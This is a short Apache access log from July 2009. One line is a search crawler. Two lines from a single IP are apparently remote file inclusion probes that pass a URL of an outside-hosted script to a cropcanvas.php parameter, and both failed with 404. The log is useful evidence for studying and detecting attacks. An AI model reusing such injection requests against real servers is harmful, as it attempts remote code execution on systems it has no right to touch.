72.30.142.177 - - [12/Jul/2009:06:31:56 -0400] "GET /logs/access_log.Q109070100 HTTP/1.0" 200 4008187 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.234.63.107 - - [12/Jul/2009:06:32:48 -0400] "GET /logs/access_log.Q109052100%20%20//cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
89.234.63.107 - - [12/Jul/2009:06:32:48 -0400] "GET /logs/access_log.Q109053000%20%20//cropcanvas.php?cropimagedir=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
